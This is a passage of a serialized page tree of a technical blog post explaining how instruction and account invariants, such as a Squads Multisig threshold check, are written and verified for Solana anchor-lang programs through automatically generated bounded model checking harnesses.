alue":24226},{"type":25,"tag":216,"props":24603,"children":24604},{"style":7047},[24605],{"type":31,"value":24606}," my_instruction",{"type":25,"tag":216,"props":24608,"children":24609},{"style":6964},[24610],{"type":31,"value":1850},{"type":25,"tag":216,"props":24612,"children":24613},{"style":6947},[24614],{"type":31,"value":24240},{"type":25,"tag":216,"props":24616,"children":24617},{"style":6953},[24618],{"type":31,"value":1472},{"type":25,"tag":216,"props":24620,"children":24621},{"style":7375},[24622],{"type":31,"value":24249},{"type":25,"tag":216,"props":24624,"children":24625},{"style":6964},[24626],{"type":31,"value":9757},{"type":25,"tag":216,"props":24628,"children":24629},{"style":6953},[24630],{"type":31,"value":13547},{"type":25,"tag":216,"props":24632,"children":24633},{"style":6964},[24634],{"type":31,"value":24406},{"type":25,"tag":216,"props":24636,"children":24637},{"style":6953},[24638],{"type":31,"value":17714},{"type":25,"tag":216,"props":24640,"children":24641},{"style":7375},[24642],{"type":31,"value":17719},{"type":25,"tag":216,"props":24644,"children":24645},{"style":6964},[24646],{"type":31,"value":24291},{"type":25,"tag":216,"props":24648,"children":24649},{"class":6922,"line":7216},[24650],{"type":25,"tag":216,"props":24651,"children":24652},{"style":6953},[24653],{"type":31,"value":24299},{"type":25,"tag":216,"props":24655,"children":24656},{"class":6922,"line":7244},[24657],{"type":25,"tag":216,"props":24658,"children":24659},{"style":6964},[24660],{"type":31,"value":7874},{"type":25,"tag":38,"props":24662,"children":24663},{},[24664],{"type":31,"value":24665},"Note that in practice, it is usually not necessary (or useful) to find the exact condition; rather we can achieve the security properties we want purely by proving upper and lower bounds on instruction success.",{"type":25,"tag":630,"props":24667,"children":24669},{"id":24668},"account-invariants",[24670],{"type":31,"value":24671},"Account Invariants",{"type":25,"tag":38,"props":24673,"children":24674},{},[24675,24677,24682],{"type":31,"value":24676},"The other type of invariant is an ",{"type":25,"tag":9273,"props":24678,"children":24679},{},[24680],{"type":31,"value":24681},"Account Invariant",{"type":31,"value":24683},". This invariant describes some property of an account that should always hold.",{"type":25,"tag":38,"props":24685,"children":24686},{},[24687,24689,24694,24695,24701],{"type":31,"value":24688},"In our tool, we verify that the account invariant holds after every instruction that could modify the account data (i.e. if the account is ",{"type":25,"tag":82,"props":24690,"children":24692},{"className":24691},[],[24693],{"type":31,"value":7691},{"type":31,"value":17090},{"type":25,"tag":82,"props":24696,"children":24698},{"className":24697},[],[24699],{"type":31,"value":24700},"init",{"type":31,"value":24702},").",{"type":25,"tag":38,"props":24704,"children":24705},{},[24706,24708,24714],{"type":31,"value":24707},"For example, given a mock ",{"type":25,"tag":82,"props":24709,"children":24711},{"className":24710},[],[24712],{"type":31,"value":24713},"UserStatement",{"type":31,"value":24715}," account that represents how much a user owns and owes, we could write an invariant that asserts that the net balance is positive:",{"type":25,"tag":206,"props":24717,"children":24719},{"code":24718,"language":6914,"meta":7,"className":6915,"style":7},"#[account]\n#[invariant(\n    self.assets >= self.liabilities\n)]\nstruct UserStatement {\n    pub owner: Pubkey,\n    pub assets: u64,\n    pub liabilities: u64,\n}\n",[24720],{"type":25,"tag":82,"props":24721,"children":24722},{"__ignoreMap":7},[24723,24731,24739,24773,24780,24796,24822,24846,24870],{"type":25,"tag":216,"props":24724,"children":24725},{"class":6922,"line":6923},[24726],{"type":25,"tag":216,"props":24727,"children":24728},{"style":6964},[24729],{"type":31,"value":24730},"#[account]\n",{"type":25,"tag":216,"props":24732,"children":24733},{"class":6922,"line":6769},[24734],{"type":25,"tag":216,"props":24735,"children":24736},{"style":6964},[24737],{"type":31,"value":24738},"#[invariant(\n",{"type":25,"tag":216,"props":24740,"children":24741},{"class":6922,"line":6778},[24742,24747,24751,24756,24760,24764,24768],{"type":25,"tag":216,"props":24743,"children":24744},{"style":6964},[24745],{"type":31,"value":24746},"    self",{"type":25,"tag":216,"props":24748,"children":24749},{"style":6953},[24750],{"type":31,"value":179},{"type":25,"tag":216,"props":24752,"children":24753},{"style":6964},[24754],{"type":31,"value":24755},"assets ",{"type":25,"tag":216,"props":24757,"children":24758},{"style":6953},[24759],{"type":31,"value":13900},{"type":25,"tag":216,"props":24761,"children":24762},{"style":6964},[24763],{"type":31,"value":17754},{"type":25,"tag":216,"props":24765,"children":24766},{"style":6953},[24767],{"type":31,"value":179},{"type":25,"tag":216,"props":24769,"children":24770},{"style":6964},[24771],{"type":31,"value":24772},"liabilities\n",{"type":25,"tag":216,"props":24774,"children":24775},{"class":6922,"line":7005},[24776],{"type":25,"tag":216,"props":24777,"children":24778},{"style":6964},[24779],{"type":31,"value":24218},{"type":25,"tag":216,"props":24781,"children":24782},{"class":6922,"line":7110},[24783,24787,24792],{"type":25,"tag":216,"props":24784,"children":24785},{"style":6936},[24786],{"type":31,"value":13357},{"type":25,"tag":216,"props":24788,"children":24789},{"style":7375},[24790],{"type":31,"value":24791}," UserStatement",{"type":25,"tag":216,"props":24793,"children":24794},{"style":6964},[24795],{"type":31,"value":7241},{"type":25,"tag":216,"props":24797,"children":24798},{"class":6922,"line":7216},[24799,24804,24809,24813,24818],{"type":25,"tag":216,"props":24800,"children":24801},{"style":6936},[24802],{"type":31,"value":24803},"    pub",{"type":25,"tag":216,"props":24805,"children":24806},{"style":6947},[24807],{"type":31,"value":24808}," owner",{"type":25,"tag":216,"props":24810,"children":24811},{"style":6953},[24812],{"type":31,"value":1472},{"type":25,"tag":216,"props":24814,"children":24815},{"style":7375},[24816],{"type":31,"value":24817}," Pubkey",{"type":25,"tag":216,"props":24819,"children":24820},{"style":6964},[24821],{"type":31,"value":7465},{"type":25,"tag":216,"props":24823,"children":24824},{"class":6922,"line":7244},[24825,24829,24834,24838,24842],{"type":25,"tag":216,"props":24826,"children":24827},{"style":6936},[24828],{"type":31,"value":24803},{"type":25,"tag":216,"props":24830,"children":24831},{"style":6947},[24832],{"type":31,"value":24833}," assets",{"type":25,"tag":216,"props":24835,"children":24836},{"style":6953},[24837],{"type":31,"value":1472},{"type":25,"tag":216,"props":24839,"children":24840},{"style":7375},[24841],{"type":31,"value":9811},{"type":25,"tag":216,"props":24843,"children":24844},{"style":6964},[24845],{"type":31,"value":7465},{"type":25,"tag":216,"props":24847,"children":24848},{"class":6922,"line":7257},[24849,24853,24858,24862,24866],{"type":25,"tag":216,"props":24850,"children":24851},{"style":6936},[24852],{"type":31,"value":24803},{"type":25,"tag":216,"props":24854,"children":24855},{"style":6947},[24856],{"type":31,"value":24857}," liabilities",{"type":25,"tag":216,"props":24859,"children":24860},{"style":6953},[24861],{"type":31,"value":1472},{"type":25,"tag":216,"props":24863,"children":24864},{"style":7375},[24865],{"type":31,"value":9811},{"type":25,"tag":216,"props":24867,"children":24868},{"style":6964},[24869],{"type":31,"value":7465},{"type":25,"tag":216,"props":24871,"children":24872},{"class":6922,"line":7275},[24873],{"type":25,"tag":216,"props":24874,"children":24875},{"style":6964},[24876],{"type":31,"value":7874},{"type":25,"tag":38,"props":24878,"children":24879},{},[24880,24882,24887],{"type":31,"value":24881},"Our tool automatically generates the relevant harnesses to ensure that this property holds every time an account of type ",{"type":25,"tag":82,"props":24883,"children":24885},{"className":24884},[],[24886],{"type":31,"value":24713},{"type":31,"value":24888}," is created or modified.",{"type":25,"tag":38,"props":24890,"children":24891},{},[24892,24894,24900],{"type":31,"value":24893},"In another example, we developed the following invariant for the ",{"type":25,"tag":162,"props":24895,"children":24897},{"href":22784,"rel":24896},[166],[24898],{"type":31,"value":24899},"Squads Multisig",{"type":31,"value":24901}," wallet account:",{"type":25,"tag":206,"props":24903,"children":24905},{"code":24904,"language":6914,"meta":7,"className":6915,"style":7},"#[account]\n#[invariant(\n    !self.keys.is_empty()\n    && (self.keys.len() \u003C= u16::MAX as usize)\n    && (self.threshold >= 1)\n    && (self.threshold as usize \u003C= self.keys.len())\n)]\npub struct Ms {\n    pub threshold: u16,               // threshold for signatures\n    pub authority_index: u16,         // index to seed other authorities under this multisig\n    pub transaction_index: u32,       // look up and seed reference for transactions\n    pub ms_change_index: u32,         // the last executed/closed transaction\n    pub bump: u8,                     // bump for the multisig seed\n    pub create_key: Pubkey,           // random key(or not) used to seed the multisig pda\n    pub allow_external_execute: bool, // allow non-member keys to execute txs\n    pub keys: Vec\u003CPubkey>,            // keys of the members\n}\n",[24906],{"type":25,"tag":82,"props":24907,"children":24908},{"__ignoreMap":7},[24909,24916,24923,24953,25012,25041,25093,25100,25121,25151,25181,25211,25240,25270,25300,25329,25369],{"type":25,"tag":216,"props":24910,"children":24911},{"class":6922,"line":6923},[24912],{"type":25,"tag":216,"props":24913,"children":24914},{"style":6964},[24915],{"type":31,"value":24730},{"type":25,"tag":216,"props":24917,"children":24918},{"class":6922,"line":6769},[24919],{"type":25,"tag":216,"props":24920,"children":24921},{"style":6964},[24922],{"type":31,"value":24738},{"type":25,"tag":216,"props":24924,"children":24925},{"class":6922,"line":6778},[24926,24931,24935,24939,24944,24948],{"type":25,"tag":216,"props":24927,"children":24928},{"style":6953},[24929],{"type":31,"value":24930},"    !",{"type":25,"tag":216,"props":24932,"children":24933},{"style":6964},[24934],{"type":31,"value":17670},{"type":25,"tag":216,"props":24936,"children":24937},{"style":6953},[24938],{"type":31,"value":179},{"type":25,"tag":216,"props":24940,"children":24941},{"style":6964},[24942],{"type":31,"value":24943},"keys",{"type":25,"tag":216,"props":24945,"children":24946},{"style":6953},[24947],{"type":31,"value":179},{"type":25,"tag":216,"props":24949,"children":24950},{"style":6964},[24951],{"type":31,"value":24952},"is_empty()\n",{"type":25,"tag":216,"props":24954,"children":24955},{"class":6922,"line":7005},[24956,24960,24965,24969,24973,24977,24982,24986,24991,24995,25000,25004,25008],{"type":25,"tag":216,"props":24957,"children":24958},{"style":6953},[24959],{"type":31,"value":19579},{"type":25,"tag":216,"props":24961,"children":24962},{"style":6964},[24963],{"type":31,"value":24964}," (self",{"type":25,"tag":216,"props":24966,"children":24967},{"style":6953},[24968],{"type":31,"value":179},{"type":25,"tag":216,"props":24970,"children":24971},{"style":6964},[24972],{"type":31,"value":24943},{"type":25,"tag":216,"props":24974,"children":24975},{"style":6953},[24976],{"type":31,"value":179},{"type":25,"tag":216,"props":24978,"children":24979},{"style":6964},[24980],{"type":31,"value":24981},"len() ",{"type":25,"tag":216,"props":24983,"children":24984},{"style":6953},[24985],{"type":31,"value":23374},{"type":25,"tag":216,"props":24987,"children":24988},{"style":7375},[24989],{"type":31,"value":24990}," u16",{"type":25,"tag":216,"props":24992,"children":24993},{"style":6953},[24994],{"type":31,"value":7438},{"type":25,"tag":216,"props":24996,"children":24997},{"style":7375},[24998],{"type":31,"value":24999},"MAX",{"type":25,"tag":216,"props":25001,"children":25002},{"style":6936},[25003],{"type":31,"value":12781},{"type":25,"tag":216,"props":25005,"children":25006},{"style":7375},[25007],{"type":31,"value":17688},{"type":25,"tag":216,"props":25009,"children":25010},{"style":6964},[25011],{"type":31,"value":7107},{"type":25,"tag":216,"props":25013,"children":25014},{"class":6922,"line":7110},[25015,25019,25023,25027,25032,25036],{"type":25,"tag":216,"props":25016,"children":25017},{"style":6953},[25018],{"type":31,"value":19579},{"type":25,"tag":216,"props":25020,"children":25021},{"style":6964},[25022],{"type":31,"value":24964},{"type":25,"tag":216,"props":25024,"children":25025},{"style":6953},[25026],{"type":31,"value":179},{"type":25,"tag":216,"props":25028,"children":25029},{"style":6964},[25030],{"type":31,"value":25031},"threshold ",{"type":25,"tag":216,"props":25033,"children":25034},{"style":6953},[25035],{"type":31,"value":13900},{"type":25,"tag":216,"props":25037,"children":25038},{"style":6964},[25039],{"type":31,"value":25040}," 1)\n",{"type":25,"tag":216,"props":25042,"children":25043},{"class":6922,"line":7216},[25044,25048,25052,25056,25060,25064,25068,25072,25076,25080,25084,25088],{"type":25,"tag":216,"props":25045,"children":25046},{"style":6953},[25047],{"type":31,"value":19579},{"type":25,"tag":216,"props":25049,"children":25050},{"style":6964},[25051],{"type":31,"value":24964},{"type":25,"tag":216,"props":25053,"children":25054},{"style":6953},[25055],{"type":31,"value":179},{"type":25,"tag":216,"props":25057,"children":25058},{"style":6964},[25059],{"type":31,"value":25031},{"type":25,"tag":216,"props":25061,"children":25062},{"style":6936},[25063],{"type":31,"value":12795},{"type":25,"tag":216,"props":25065,"children":25066},{"style":7375},[25067],{"type":31,"value":17688},{"type":25,"tag":216,"props":25069,"children":25070},{"style":6953},[25071],{"type":31,"value":12149},{"type":25,"tag":216,"props":25073,"children":25074},{"style":6964},[25075],{"type":31,"value":17754},{"type":25,"tag":216,"props":25077,"children":25078},{"style":6953},[25079],{"type":31,"value":179},{"type":25,"tag":216,"props":25081,"children":25082},{"style":6964},[25083],{"type":31,"value":24943},{"type":25,"tag":216,"props":25085,"children":25086},{"style":6953},[25087],{"type":31,"value":179},{"type":25,"tag":216,"props":25089,"children":25090},{"style":6964},[25091],{"type":31,"value":25092},"len())\n",{"type":25,"tag":216,"props":25094,"children":25095},{"class":6922,"line":7244},[25096],{"type":25,"tag":216,"props":25097,"children":25098},{"style":6964},[25099],{"type":31,"value":24218},{"type":25,"tag":216,"props":25101,"children":25102},{"class":6922,"line":7257},[25103,25107,25112,25117],{"type":25,"tag":216,"props":25104,"children":25105},{"style":6936},[25106],{"type":31,"value":17647},{"type":25,"tag":216,"props":25108,"children":25109},{"style":6936},[25110],{"type":31,"value":25111}," struct",{"type":25,"tag":216,"props":25113,"children":25114},{"style":7375},[25115],{"type":31,"value":25116}," Ms",{"type":25,"tag":216,"props":25118,"children":25119},{"style":6964},[25120],{"type":31,"value":7241},{"type":25,"tag":216,"props":25122,"children":25123},{"class":6922,"line":7275},[25124,25128,25133,25137,25141,25146],{"type":25,"tag":216,"props":25125,"children":25126},{"style":6936},[25127],{"type":31,"value":24803},{"type":25,"tag":216,"props":25129,"children":25130},{"style":6947},[25131],{"type":31,"value":25132}," threshold",{"type":25,"tag":216,"props":25134,"children":25135},{"style":6953},[25136],{"type":31,"value":1472},{"type":25,"tag":216,"props":25138,"children":25139},{"style":7375},[25140],{"type":31,"value":24990},{"type":25,"tag":216,"props":25142,"children":25143},{"style":6964},[25144],{"type":31,"value":25145},",               ",{"type":25,"tag":216,"props":25147,"children":25148},{"style":6927},[25149],{"type":31,"value":25150},"// threshold for signatures\n",{"type":25,"tag":216,"props":25152,"children":25153},{"class":6922,"line":7296},[25154,25158,25163,25167,25171,25176],{"type":25,"tag":216,"props":25155,"children":25156},{"style":6936},[25157],{"type":31,"value":24803},{"type":25,"tag":216,"props":25159,"children":25160},{"style":6947},[25161],{"type":31,"value":25162}," authority_index",{"type":25,"tag":216,"props":25164,"children":25165},{"style":6953},[25166],{"type":31,"value":1472},{"type":25,"tag":216,"props":25168,"children":25169},{"style":7375},[25170],{"type":31,"value":24990},{"type":25,"tag":216,"props":25172,"children":25173},{"style":6964},[25174],{"type":31,"value":25175},",         ",{"type":25,"tag":216,"props":25177,"children":25178},{"style":6927},[25179],{"type":31,"value":25180},"// index to seed other authorities under this multisig\n",{"type":25,"tag":216,"props":25182,"children":25183},{"class":6922,"line":7305},[25184,25188,25193,25197,25201,25206],{"type":25,"tag":216,"props":25185,"children":25186},{"style":6936},[25187],{"type":31,"value":24803},{"type":25,"tag":216,"props":25189,"children":25190},{"style":6947},[25191],{"type":31,"value":25192}," transaction_index",{"type":25,"tag":216,"props":25194,"children":25195},{"style":6953},[25196],{"type":31,"value":1472},{"type":25,"tag":216,"props":25198,"children":25199},{"style":7375},[25200],{"type":31,"value":21507},{"type":25,"tag":216,"props":25202,"children":25203},{"style":6964},[25204],{"type":31,"value":25205},",       ",{"type":25,"tag":216,"props":25207,"children":25208},{"style":6927},[25209],{"type":31,"value":25210},"// look up and seed reference for transactions\n",{"type":25,"tag":216,"props":25212,"children":25213},{"class":6922,"line":7557},[25214,25218,25223,25227,25231,25235],{"type":25,"tag":216,"props":25215,"children":25216},{"style":6936},[25217],{"type":31,"value":24803},{"type":25,"tag":216,"props":25219,"children":25220},{"style":6947},[25221],{"type":31,"value":25222}," ms_change_index",{"type":25,"tag":216,"props":25224,"children":25225},{"style":6953},[25226],{"type":31,"value":1472},{"type":25,"tag":216,"props":25228,"children":25229},{"style":7375},[25230],{"type":31,"value":21507},{"type":25,"tag":216,"props":25232,"children":25233},{"style":6964},[25234],{"type":31,"value":25175},{"type":25,"tag":216,"props":25236,"children":25237},{"style":6927},[25238],{"type":31,"value":25239},"// the last executed/closed transaction\n",{"type":25,"tag":216,"props":25241,"children":25242},{"class":6922,"line":7574},[25243,25247,25252,25256,25260,25265],{"type":25,"tag":216,"props":25244,"children":25245},{"style":6936},[25246],{"type":31,"value":24803},{"type":25,"tag":216,"props":25248,"children":25249},{"style":6947},[25250],{"type":31,"value":25251}," bump",{"type":25,"tag":216,"props":25253,"children":25254},{"style":6953},[25255],{"type":31,"value":1472},{"type":25,"tag":216,"props":25257,"children":25258},{"style":7375},[25259],{"type":31,"value":18591},{"type":25,"tag":216,"props":25261,"children":25262},{"style":6964},[25263],{"type":31,"value":25264},",                     ",{"type":25,"tag":216,"props":25266,"children":25267},{"style":6927},[25268],{"type":31,"value":25269},"// bump for the multisig seed\n",{"type":25,"tag":216,"props":25271,"children":25272},{"class":6922,"line":7591},[25273,25277,25282,25286,25290,25295],{"type":25,"tag":216,"props":25274,"children":25275},{"style":6936},[25276],{"type":31,"value":24803},{"type":25,"tag":216,"props":25278,"children":25279},{"style":6947},[25280],{"type":31,"value":25281}," create_key",{"type":25,"tag":216,"props":25283,"children":25284},{"style":6953},[25285],{"type":31,"value":1472},{"type":25,"tag":216,"props":25287,"children":25288},{"style":7375},[25289],{"type":31,"value":24817},{"type":25,"tag":216,"props":25291,"children":25292},{"style":6964},[25293],{"type":31,"value":25294},",           ",{"type":25,"tag":216,"props":25296,"children":25297},{"style":6927},[25298],{"type":31,"value":25299},"// random key(or not) used to seed the multisig pda\n",{"type":25,"tag":216,"props":25301,"children":25302},{"class":6922,"line":7604},[25303,25307,25312,25316,25320,25324],{"type":25,"tag":216,"props":25304,"children":25305},{"style":6936},[25306],{"type":31,"value":24803},{"type":25,"tag":216,"props":25308,"children":25309},{"style":6947},[25310],{"type":31,"value":25311}," allow_external_execute",{"type":25,"tag":216,"props":25313,"children":25314},{"style":6953},[25315],{"type":31,"value":1472},{"type":25,"tag":216,"props":25317,"children":25318},{"style":7375},[25319],{"type":31,"value":16006},{"type":25,"tag":216,"props":25321,"children":25322},{"style":6964},[25323],{"type":31,"value":7026},{"type":25,"tag":216,"props":25325,"children":25326},{"style":6927},[25327],{"type":31,"value":25328},"// allow non-member keys to execute txs\n",{"type":25,"tag":216,"props":25330,"children":25331},{"class":6922,"line":7613},[25332,25336,25341,25345,25350,25354,25359,25364],{"type":25,"tag":216,"props":25333,"children":25334},{"style":6936},[25335],{"type":31,"value":24803},{"type":25,"tag":216,"props":25337,"children":25338},{"style":6947},[25339],{"type":31,"value":25340}," keys",{"type":25,"tag":216,"props":25342,"children":25343},{"style":6953},[25344],{"type":31,"value":1472},{"type":25,"tag":216,"props":25346,"children":25347},{"style":7375},[25348],{"type":31,"value":25349}," Vec",{"type":25,"tag":216,"props":25351,"children":25352},{"style":6964},[25353],{"type":31,"value":9757},{"type":25,"tag":216,"props":25355,"children":25356},{"style":7375},[25357],{"type":31,"value":25358},"Pubkey",{"type":25,"tag":216,"props":25360,"children":25361},{"style":6964},[25362],{"type":31,"value":25363},">,            ",{"type":25,"tag":216,"props":25365,"children":25366},{"style":6927},[25367],{"type":31,"value":25368},"// keys of the members\n",{"type":25,"tag":216,"props":25370,"children":25371},{"class":6922,"line":7636},[25372],{"type":25,"tag":216,"props":25373,"children":25374},{"style":6964},[25375],{"type":31,"value":7874},{"type":25,"tag":38,"props":25377,"children":25378},{},[25379],{"type":31,"value":25380},"Here we are verifying multiple things at once:",{"type":25,"tag":2039,"props":25382,"children":25383},{},[25384,25395,25406,25417],{"type":25,"tag":2043,"props":25385,"children":25386},{},[25387,25393],{"type":25,"tag":82,"props":25388,"children":25390},{"className":25389},[],[25391],{"type":31,"value":25392},"!self.keys.is_empty()",{"type":31,"value":25394}," : ensure there is at least one member",{"type":25,"tag":2043,"props":25396,"children":25397},{},[25398,25404],{"type":25,"tag":82,"props":25399,"children":25401},{"className":25400},[],[25402],{"type":31,"value":25403},"self.keys.len() \u003C= u16::MAX as usize",{"type":31,"value":25405}," : set an upper limit of 65535 members",{"type":25,"tag":2043,"props":25407,"children":25408},{},[25409,25415],{"type":25,"tag":82,"props":25410,"children":25412},{"className":25411},[],[25413],{"type":31,"value":25414},"self.threshold >= 1",{"type":31,"value":25416}," : ensure we always need at least one member to sign (threshold of zero would require no signers!)",{"type":25,"tag":2043,"props":25418,"children":25419},{},[25420,25426],{"type":25,"tag":82,"props":25421,"children":25423},{"className":25422},[],[25424],{"type":31,"value":25425},"self.threshold as usize \u003C= self.keys.len()",{"type":31,"value":25427}," : ensure we always have enough potential members to sign; if threshold was greater than the number of keys, no one could sign",{"type":25,"tag":26,"props":25429,"children":25431},{"id":25430},"verification-how-do-we-check-that-our-model-is-correct",[25432],{"type":31,"value":25433},"Verification: How do we check that our model is correct?",{"type":25,"tag":38,"props":25435,"children":25436},{},[25437,25439,25443,25445,25450],{"type":31,"value":25438},"Now that we have defined the specific instruction and account invariants, we need to generate ",{"type":25,"tag":64,"props":25440,"children":25441},{},[25442],{"type":31,"value":23929},{"type":31,"value":25444}," on which we can run bounded model checking. Our tool does this ",{"type":25,"tag":64,"props":25446,"children":25447},{},[25448],{"type":31,"value":25449},"automagically",{"type":31,"value":25451}," for anchor-lang programs.",{"type":25,"tag":38,"props":25453,"children":25454},{},[25455,25457,25463,25465,25470,25472,25477,25478,25483,25485,25490,25492,25497,25498,25504,25506,25512,25513,25519],{"type":31,"value":25456},"Specifically, for a given ",{"type":25,"tag":82,"props":25458,"children":25460},{"className":25459},[],[25461],{"type":31,"value":25462},"Context\u003CT>",{"type":31,"value":25464}," with ",{"type":25,"tag":64,"props":25466,"children":25467},{},[25468],{"type":31,"value":25469},"incoming",{"type":31,"value":25471}," accounts of types (",{"type":25,"tag":82,"props":25473,"children":25475},{"className":25474},[],[25476],{"type":31,"value":24700},{"type":31,"value":5755},{"type":25,"tag":82,"props":25479,"children":25481},{"className":25480},[],[25482],{"type":31,"value":7691},{"type":31,"value":25484},") and ",{"type":25,"tag":64,"props":25486,"children":25487},{},[25488],{"type":31,"value":25489},"outgoing",{"type":31,"value":25491}," accounts of type (",{"type":25,"tag":82,"props":25493,"children":25495},{"className":25494},[],[25496],{"type":31,"value":7691},{"type":31,"value":5755},{"type":25,"tag":82,"props":25499,"children":25501},{"className":25500},[],[25502],{"type":31,"value":25503},"close",{"type":31,"value":25505},") we define a ",{"type":25,"tag":82,"props":25507,"children":25509},{"className":25508},[],[25510],{"type":31,"value":25511},"pre_condition",{"type":31,"value":1307},{"type":25,"tag":82,"props":25514,"children":25516},{"className":25515},[],[25517],{"type":31,"value":25518},"post_condition",{"type":31,"value":25520}," expression that is a conjunction of all of the incoming and outcoming account invariants:",{"type":25,"tag":38,"props":25522,"children":25523},{},[25524],{"type":25,"tag":82,"props":25525,"children":25527},{"className":25526},[212,4702],[25528],{"type":25,"tag":216,"props":25529,"children":25531},{"className":25530},[224],[25532],{"type":25,"tag":216,"props":25533,"children":25535},{"className":25534,"ariaHidden":230},[229],[25536,25567],{"type":25,"tag":216,"props":25537,"children":25539},{"className":25538},[235],[25540,25544,25549,25554,25558,25563],{"type":25,"tag":216,"props":25541,"children":25543},{"className":25542,"style":4799},[240],[],{"type":25,"tag":216,"props":25545,"children":25547},{"className":25546,"style":2152},[246,2151],[25548],{"type":31,"value":2155},{"type":25,"tag":216,"props":25550,"children":25552},{"className":25551},[246],[25553],{"type":31,"value":1882},{"type":25,"tag":216,"props":25555,"children":25557},{"className":25556,"style":258},[257],[],{"type":25,"tag":216,"props":25559,"children":25561},{"className":25560},[263],[25562],{"type":31,"value":3008},{"type":25,"tag":216,"props":25564,"children":25566},{"className":25565,"style":258},[257],[],{"type":25,"tag":216,"props":25568,"children":25570},{"className":25569},[235],[25571,25576,25708,25712],{"type":25,"tag":216,"props":25572,"children":25575},{"className":25573,"style":25574},[240],"height:1.2247em;vertical-align:-0.4747em;",[],{"type":25,"tag":216,"props":25577,"children":25579},{"className":25578},[1841],[25580,25588],{"type":25,"tag":216,"props":25581,"children":25585},{"className":25582,"style":25584},[1841,4048,25583],"small-op","position:relative;top:0em;",[25586],{"type":31,"value":25587},"⋀",{"type":25,"tag":216,"props":25589,"children":25591},{"className":25590},[2159],[25592],{"type":25,"tag":216,"props":25593,"children":25595},{"className":25594},[298,299],[25596,25696],{"type":25,"tag":216,"props":25597,"children":25599},{"className":25598},[304],[25600,25691],{"type":25,"tag":216,"props":25601,"children":25604},{"className":25602,"style":25603},[309],"height:0.2253em;",[25605],{"type":25,"tag":216,"props":25606,"children":25608},{"style":25607},"top:-2.4003em;margin-left:0em;margin-right:0.05em;",[25609,25613],{"type":25,"tag":216,"props":25610,"children":25612},{"className":25611,"style":2181},[319],[],{"type":25,"tag":216,"props":25614,"children":25616},{"className":25615},[2186,2187,2188,2189],[25617],{"type":25,"tag":216,"props":25618,"children":25620},{"className":25619},[246,2189],[25621,25626,25632,25642,25648,25657,25666,25671,25676,25681,25686],{"type":25,"tag":216,"props":25622,"children":25624},{"className":25623},[246,2151,2189],[25625],{"type":31,"value":162},{"type":25,"tag":216,"props":25627,"children":25629},{"className":25628},[246,2151,2189],[25630],{"type":31,"value":25631},"cc",{"type":25,"tag":216,"props":25633,"children":25635},{"className":25634},[257,2189],[25636],{"type":25,"tag":216,"props":25637,"children":25639},{"className":25638},[2189],[25640],{"type":31,"value":25641}," ",{"type":25,"tag":216,"props":25643,"children":25645},{"className":25644},[263,2189],[25646],{"type":31,"value":25647},"∈",{"type":25,"tag":216,"props":25649,"children":25651},{"className":25650},[257,2189],[25652],{"type":25,"tag":216,"props":25653,"children":25655},{"className":25654},[2189],[25656],{"type":31,"value":25641},{"type":25,"tag":216,"props":25658,"children":25660},{"className":25659},[246,31,2189],[25661],{"type":25,"tag":216,"props":25662,"children":25664},{"className":25663},[246,2189],[25665],{"type":31,"value":25469},{"type":25,"tag":216,"props":25667,"children":25669},{"className":25668},[287,2189],[25670],{"type":31,"value":1850},{"type":25,"tag":216,"props":25672,"children":25674},{"className":25673},[246,2151,2189],[25675],{"type":31,"value":2254},{"type":25,"tag":216,"props":25677,"children":25679},{"className":25678},[246,2151,2189],[25680],{"type":31,"value":2934},{"type":25,"tag":216,"props":25682,"children":25684},{"className":25683},[246,2151,2189],[25685],{"type":31,"value":2541},{"type":25,"tag":216,"props":25687,"children":25689},{"className":25688},[427,2189],[25690],{"type":31,"value":1888},{"type":25,"tag":216,"props":25692,"children":25694},{"className":25693},[408],[25695],{"type":31,"value":411},{"type":25,"tag":216,"props":25697,"children":25699},{"className":25698},[304],[25700],{"type":25,"tag":216,"props":25701,"children":25704},{"className":25702,"style":25703},[309],"height:0.4747em;",[25705],{"type":25,"tag":216,"props":25706,"children":25707},{},[],{"type":25,"tag":216,"props":25709,"children":25711},{"className":25710,"style":1871},[257],[],{"type":25,"tag":216,"props":25713,"children":25715},{"className":25714},[246],[25716,25726,25731,25736,25741],{"type":25,"tag":216,"props":25717,"children":25719},{"className":25718},[246,31],[25720],{"type":25,"tag":216,"props":25721,"children":25723},{"className":25722},[246],[25724],{"type":31,"value":25725},"invariant",{"type":25,"tag":216,"props":25727,"children":25729},{"className":25728},[287],[25730],{"type":31,"value":1850},{"type":25,"tag":216,"props":25732,"children":25734},{"className":25733},[246,2151],[25735],{"type":31,"value":162},{"type":25,"tag":216,"props":25737,"children":25739},{"className":25738},[246,2151],[25740],{"type":31,"value":25631},{"type":25,"tag":216,"props":25742,"children":25744},{"className":25743},[427],[25745],{"type":31,"value":1888},{"type":25,"tag":38,"props":25747,"children":25748},{},[25749],{"type":25,"tag":82,"props":25750,"children":25752},{"className":25751},[212,4702],[25753],{"type":25,"tag":216,"props":25754,"children":25756},{"className":25755},[224],[25757],{"type":25,"tag":216,"props":25758,"children":25760},{"className":25759,"ariaHidden":230},[229],[25761,25792],{"type":25,"tag":216,"props":25762,"children":25764},{"className":25763},[235],[25765,25769,25774,25779,25783,25788],{"type":25,"tag":216,"props":25766,"children":25768},{"className":25767,"style":4799},[240],[],{"type":25,"tag":216,"props":25770,"children":25772},{"className":25771,"style":2152},[246,2151],[25773],{"type":31,"value":2155},{"type":25,"tag":216,"props":25775,"children":25777},{"className":25776},[246],[25778],{"type":31,"value":184},{"type":25,"tag":216,"props":25780,"children":25782},{"className":25781,"style":258},[257],[],{"type":25,"tag":216,"props":25784,"children":25786},{"className":25785},[263],[25787],{"type":31,"value":3008},{"type":25,"tag":216,"props":25789,"children":25791},{"className":25790,"style":258},[257],[],{"type":25,"tag":216,"props":25793,"children":25795},{"className":25794},[235],[25796,25800,25923,25927],{"type":25,"tag":216,"props":25797,"children":25799},{"className":25798,"style":25574},[240],[],{"type":25,"tag":216,"props":25801,"children":25803},{"className":25802},[1841],[25804,25809],{"type":25,"tag":216,"props":25805,"children":25807},{"className":25806,"style":25584},[1841,4048,25583],[25808],{"type":31,"value":25587},{"type":25,"tag":216,"props":25810,"children":25812},{"className":25811},[2159],[25813],{"type":25,"tag":216,"props":25814,"children":25816},{"className":25815},[298,299],[25817,25912],{"type":25,"tag":216,"props":25818,"children":25820},{"className":25819},[304],[25821,25907],{"type":25,"tag":216,"props":25822,"children":25824},{"className":25823,"style":25603},[309],[25825],{"type":25,"tag":216,"props":25826,"children":25827},{"style":25607},[25828,25832],{"type":25,"tag":216,"props":25829,"children":25831},{"className":25830,"style":2181},[319],[],{"type":25,"tag":216,"props":25833,"children":25835},{"className":25834},[2186,2187,2188,21